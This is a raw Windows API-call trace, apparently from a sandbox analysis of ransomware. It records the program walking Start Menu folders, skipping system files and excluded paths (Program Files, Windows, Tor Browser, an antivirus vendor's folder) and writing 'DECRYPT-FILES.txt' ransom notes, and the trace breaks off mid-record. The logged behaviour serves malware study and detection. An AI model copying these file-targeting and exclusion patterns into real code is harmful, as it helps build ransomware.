[0186.537] lstrcmpiW (lpString1="Internet Explorer (No Add-ons).lnk", lpString2="DECRYPT-FILES.txt") returned 1 [0186.537] lstrcmpiW (lpString1="Internet Explorer (No Add-ons).lnk", lpString2="autorun.inf") returned 1 [0186.537] lstrcmpiW (lpString1="Internet Explorer (No Add-ons).lnk", lpString2="boot.ini") returned 1 [0186.537] lstrcmpiW (lpString1="Internet Explorer (No Add-ons).lnk", lpString2="desktop.ini") returned 1 [0186.537] lstrcmpiW (lpString1="Internet Explorer (No Add-ons).lnk", lpString2="ntuser.dat") returned -1 [0186.537] lstrcmpiW (lpString1="Internet Explorer (No Add-ons).lnk", lpString2="iconcache.db") returned 1 [0186.537] lstrcmpiW (lpString1="Internet Explorer (No Add-ons).lnk", lpString2="bootsect.bak") returned 1 [0186.537] lstrcmpiW (lpString1="Internet Explorer (No Add-ons).lnk", lpString2="ntuser.dat.log") returned -1 [0186.537] lstrcmpiW (lpString1="Internet Explorer (No Add-ons).lnk", lpString2="thumbs.db") returned -1 [0186.537] lstrcmpiW (lpString1="Internet Explorer (No Add-ons).lnk", lpString2="Bootfont.bin") returned 1 [0186.537] lstrlenW (lpString="Internet Explorer (No Add-ons).lnk") returned 34 [0186.537] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0186.537] FindNextFileW (in: hFindFile=0x479a38, lpFindFileData=0x36fe3a4 | out: lpFindFileData=0x36fe3a4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3d3d87bb, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x6451100, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x3d424a7b, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x51a, dwReserved0=0x0, dwReserved1=0x0, cFileName="Private Character Editor.lnk", cAlternateFileName="PRIVAT~1.LNK")) returned 1 [0186.537] lstrcmpiW (lpString1="Private Character Editor.lnk", lpString2="DECRYPT-FILES.txt") returned 1 [0186.537] lstrcmpiW (lpString1="Private Character Editor.lnk", lpString2="autorun.inf") returned 1 [0186.537] lstrcmpiW (lpString1="Private Character Editor.lnk", lpString2="boot.ini") returned 1 [0186.537] lstrcmpiW (lpString1="Private Character Editor.lnk", lpString2="desktop.ini") returned 1 [0186.537] lstrcmpiW (lpString1="Private Character Editor.lnk", lpString2="ntuser.dat") returned 1 [0186.537] lstrcmpiW (lpString1="Private Character Editor.lnk", lpString2="iconcache.db") returned 1 [0186.537] lstrcmpiW (lpString1="Private Character Editor.lnk", lpString2="bootsect.bak") returned 1 [0186.537] lstrcmpiW (lpString1="Private Character Editor.lnk", lpString2="ntuser.dat.log") returned 1 [0186.537] lstrcmpiW (lpString1="Private Character Editor.lnk", lpString2="thumbs.db") returned -1 [0186.537] lstrcmpiW (lpString1="Private Character Editor.lnk", lpString2="Bootfont.bin") returned 1 [0186.537] lstrlenW (lpString="Private Character Editor.lnk") returned 28 [0186.537] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0186.537] FindNextFileW (in: hFindFile=0x479a38, lpFindFileData=0x36fe3a4 | out: lpFindFileData=0x36fe3a4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3d3d87bb, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x6451100, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x3d424a7b, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x51a, dwReserved0=0x0, dwReserved1=0x0, cFileName="Private Character Editor.lnk", cAlternateFileName="PRIVAT~1.LNK")) returned 0 [0186.537] FindClose (in: hFindFile=0x479a38 | out: hFindFile=0x479a38) returned 1 [0186.538] CloseHandle (hObject=0xffffffff) returned 0 [0186.538] FindNextFileW (in: hFindFile=0x4799f8, lpFindFileData=0x36fe620 | out: lpFindFileData=0x36fe620*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7dc80587, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0x6392a20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x7dfa026d, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x4cc, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Explorer.lnk", cAlternateFileName="WINDOW~1.LNK")) returned 1 [0186.538] lstrcmpiW (lpString1="Windows Explorer.lnk", lpString2="DECRYPT-FILES.txt") returned 1 [0186.538] lstrcmpiW (lpString1="Windows Explorer.lnk", lpString2="autorun.inf") returned 1 [0186.538] lstrcmpiW (lpString1="Windows Explorer.lnk", lpString2="boot.ini") returned 1 [0186.538] lstrcmpiW (lpString1="Windows Explorer.lnk", lpString2="desktop.ini") returned 1 [0186.538] lstrcmpiW (lpString1="Windows Explorer.lnk", lpString2="ntuser.dat") returned 1 [0186.538] lstrcmpiW (lpString1="Windows Explorer.lnk", lpString2="iconcache.db") returned 1 [0186.538] lstrcmpiW (lpString1="Windows Explorer.lnk", lpString2="bootsect.bak") returned 1 [0186.538] lstrcmpiW (lpString1="Windows Explorer.lnk", lpString2="ntuser.dat.log") returned 1 [0186.538] lstrcmpiW (lpString1="Windows Explorer.lnk", lpString2="thumbs.db") returned 1 [0186.538] lstrcmpiW (lpString1="Windows Explorer.lnk", lpString2="Bootfont.bin") returned 1 [0186.538] lstrlenW (lpString="Windows Explorer.lnk") returned 20 [0186.538] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0186.538] FindNextFileW (in: hFindFile=0x4799f8, lpFindFileData=0x36fe620 | out: lpFindFileData=0x36fe620*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7dc80587, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0x6392a20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x7dfa026d, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x4cc, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Explorer.lnk", cAlternateFileName="WINDOW~1.LNK")) returned 0 [0186.538] FindClose (in: hFindFile=0x4799f8 | out: hFindFile=0x4799f8) returned 1 [0186.538] CloseHandle (hObject=0xffffffff) returned 0 [0186.538] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb0ceee20, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0ceee20, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Administrative Tools", cAlternateFileName="ADMINI~1")) returned 1 [0186.539] lstrcmpW (lpString1="Administrative Tools", lpString2=".") returned 1 [0186.539] lstrcmpW (lpString1="Administrative Tools", lpString2="..") returned 1 [0186.539] lstrcatW (in: lpString1="Administrative Tools", lpString2="\\" | out: lpString1="Administrative Tools\\") returned="Administrative Tools\\" [0186.539] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\", lpString2="Administrative Tools\\" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\" [0186.539] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\", lpSrch="\\Program Files") returned 0x0 [0186.539] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\", lpSrch=":\\Windows") returned 0x0 [0186.539] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\", lpSrch="\\Games\\") returned 0x0 [0186.539] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\", lpSrch="\\Tor Browser\\") returned 0x0 [0186.539] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\", lpSrch="\\ProgramData\\") returned 0x0 [0186.539] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0186.539] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0186.539] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0186.539] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\", lpSrch="\\All Users") returned 0x0 [0186.539] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\", lpSrch="\\IETldCache\\") returned 0x0 [0186.539] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\", lpSrch="\\Local Settings\\") returned 0x0 [0186.539] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\", lpSrch="\\AppData\\Local") returned 0x0 [0186.539] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\", lpSrch="AhnLab") returned 0x0 [0186.539] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0186.539] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\") returned 92 [0186.539] lstrlenW (lpString="0a16c9.tmp") returned 10 [0186.539] wsprintfW (in: param_1=0x36fde00, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\\\0a16c9.tmp") returned 103 [0186.539] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\\\0a16c9.tmp" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\administrative tools\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0xffffffff [0186.539] GetLastError () returned 0x5 [0186.539] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\") returned 92 [0186.539] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0186.539] wsprintfW (in: param_1=0x36fde00, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\\\DECRYPT-FILES.txt") returned 110 [0186.539] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\administrative tools\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0186.540] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\") returned 92 [0186.540] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\*") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\*" [0186.540] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\*", lpFindFileData=0x36fe620 | out: lpFindFileData=0x36fe620*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb0ceee20, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0ceee20, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4799f8 [0186.541] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0186.541] FindNextFileW (in: hFindFile=0x4799f8, lpFindFileData=0x36fe620 | out: lpFindFileData=0x36fe620*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb0ceee20, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0ceee20, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0186.541] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0186.541] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0186.541] FindNextFileW (in: hFindFile=0x4799f8, lpFindFileData=0x36fe620 | out: lpFindFileData=0x36fe620*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0ceee20, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb0ceee20, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0ceee20, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0186.541] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0186.541] FindNextFileW (in: hFindFile=0x4799f8, lpFindFileData=0x36fe620 | out: lpFindFileData=0x36fe620*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x636c8c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd890148c, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0186.541] lstrcmpiW (lpString1="desktop.ini", lpString2="DECRYPT-FILES.txt") returned 1 [0186.541] lstrcmpiW (lpString1="desktop.ini", lpString2="autorun.inf") returned 1 [0186.541] lstrcmpiW (lpString1="desktop.ini", lpString2="boot.ini") returned 1 [0186.541] lstrcmpiW (lpString1="desktop.ini", lpString2="desktop.ini") returned 0 [0186.541] FindNextFileW (in: hFindFile=0x4799f8, lpFindFileData=0x36fe620 | out: lpFindFileData=0x36fe620*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x636c8c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd890148c, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0186.541] FindClose (in: hFindFile=0x4799f8 | out: hFindFile=0x4799f8) returned 1 [0186.546] CloseHandle (hObject=0xffffffff) returned 0 [0186.546] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0cc8cc0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb0cc8cc0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0cc8cc0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0186.546] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0186.546] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6451100, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6451100, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd888f06b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x1dc, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0186.546] lstrcmpiW (lpString1="desktop.ini", lpString2="DECRYPT-FILES.txt") returned 1 [0186.546] lstrcmpiW (lpString1="desktop.ini", lpString2="autorun.inf") returned 1 [0186.546] lstrcmpiW (lpString1="desktop.ini", lpString2="boot.ini") returned 1 [0186.546] lstrcmpiW (lpString1="desktop.ini", lpString2="desktop.ini") returned 0 [0186.546] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x642afa0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x642afa0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x921e7f, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x587, dwReserved0=0x0, dwReserved1=0x0, cFileName="Internet Explorer (64-bit).lnk", cAlternateFileName="INTERN~2.LNK")) returned 1 [0186.546] lstrcmpiW (lpString1="Internet Explorer (64-bit).lnk", lpString2="DECRYPT-FILES.txt") returned 1 [0186.546] lstrcmpiW (lpString1="Internet Explorer (64-bit).lnk", lpString2="autorun.inf") returned 1 [0186.546] lstrcmpiW (lpString1="Internet Explorer (64-bit).lnk", lpString2="boot.ini") returned 1 [0186.546] lstrcmpiW (lpString1="Internet Explorer (64-bit).lnk", lpString2="desktop.ini") returned 1 [0186.546] lstrcmpiW (lpString1="Internet Explorer (64-bit).lnk", lpString2="ntuser.dat") returned -1 [0186.546] lstrcmpiW (lpString1="Internet Explorer (64-bit).lnk", lpString2="iconcache.db") returned 1 [0186.546] lstrcmpiW (lpString1="Internet Explorer (64-bit).lnk", lpString2="bootsect.bak") returned 1 [0186.546] lstrcmpiW (lpString1="Internet Explorer (64-bit).lnk", lpString2="ntuser.dat.log") returned -1 [0186.546] lstrcmpiW (lpString1="Internet Explorer (64-bit).lnk", lpString2="thumbs.db") returned -1 [0186.546] lstrcmpiW (lpString1="Internet Explorer (64-bit).lnk", lpString2="Bootfont.bin") returned 1 [0186.546] lstrlenW (lpString="Internet Explorer (64-bit).lnk") returned 30 [0186.546] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0186.546] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6392a20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6392a20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x921e7f, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x5a9, dwReserved0=0x0, dwReserved1=0x0, cFileName="Internet Explorer.lnk", cAlternateFileName="INTERN~1.LNK")) returned 1 [0186.546] lstrcmpiW (lpString1="Internet Explorer.lnk", lpString2="DECRYPT-FILES.txt") returned 1 [0186.546] lstrcmpiW (lpString1="Internet Explorer.lnk", lpString2="autorun.inf") returned 1 [0186.546] lstrcmpiW (lpString1="Internet Explorer.lnk", lpString2="boot.ini") returned 1 [0186.546] lstrcmpiW (lpString1="Internet Explorer.lnk", lpString2="desktop.ini") returned 1 [0186.546] lstrcmpiW (lpString1="Internet Explorer.lnk", lpString2="ntuser.dat") returned -1 [0186.546] lstrcmpiW (lpString1="Internet Explorer.lnk", lpString2="iconcache.db") returned 1 [0186.547] lstrcmpiW (lpString1="Internet Explorer.lnk", lpString2="bootsect.bak") returned 1 [0186.547] lstrcmpiW (lpString1="Internet Explorer.lnk", lpString2="ntuser.dat.log") returned -1 [0186.547] lstrcmpiW (lpString1="Internet Explorer.lnk", lpString2="thumbs.db") returned -1 [0186.547] lstrcmpiW (lpString1="Internet Explorer.lnk", lpString2="Bootfont.bin") returned 1 [0186.547] lstrlenW (lpString="Internet Explorer.lnk") returned 21 [0186.547] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0186.547] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda4e0ba, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb0ceee20, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0ceee20, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Maintenance", cAlternateFileName="MAINTE~1")) returned 1 [0186.547] lstrcmpW (lpString1="Maintenance", lpString2=".") returned 1 [0186.547] lstrcmpW (lpString1="Maintenance", lpString2="..") returned 1 [0186.547] lstrcatW (in: lpString1="Maintenance", lpString2="\\" | out: lpString1="Maintenance\\") returned="Maintenance\\" [0186.547] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\", lpString2="Maintenance\\" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\" [0186.547] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\", lpSrch="\\Program Files") returned 0x0 [0186.547] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\", lpSrch=":\\Windows") returned 0x0 [0186.547] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\", lpSrch="\\Games\\") returned 0x0 [0186.547] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\", lpSrch="\\Tor Browser\\") returned 0x0 [0186.547] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\", lpSrch="\\ProgramData\\") returned 0x0 [0186.547] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0186.547] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0186.547] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0186.547] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\", lpSrch="\\All Users") returned 0x0 [0186.547] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\", lpSrch="\\IETldCache\\") returned 0x0 [0186.547] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\", lpSrch="\\Local Settings\\") returned 0x0 [0186.547] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\", lpSrch="\\AppData\\Local") returned 0x0 [0186.547] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\", lpSrch="AhnLab") returned 0x0 [0186.547] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0186.547] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\") returned 83 [0186.547] lstrlenW (lpString="0a16c9.tmp") returned 10 [0186.547] wsprintfW (in: param_1=0x36fde00, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\\\0a16c9.tmp") returned 94 [0186.547] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\\\0a16c9.tmp" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\maintenance\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0xffffffff [0186.547] GetLastError () returned 0x5 [0186.548] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\") returned 83 [0186.548] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0186.548] wsprintfW (in: param_1=0x36fde00, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\\\DECRYPT-FILES.txt") returned 101 [0186.548] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\maintenance\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0186.548] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\") returned 83 [0186.548] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\*") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\*" [0186.548] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\*", lpFindFileData=0x36fe620 | out: lpFindFileData=0x36fe620*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda4e0ba, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb0ceee20, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0ceee20, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, 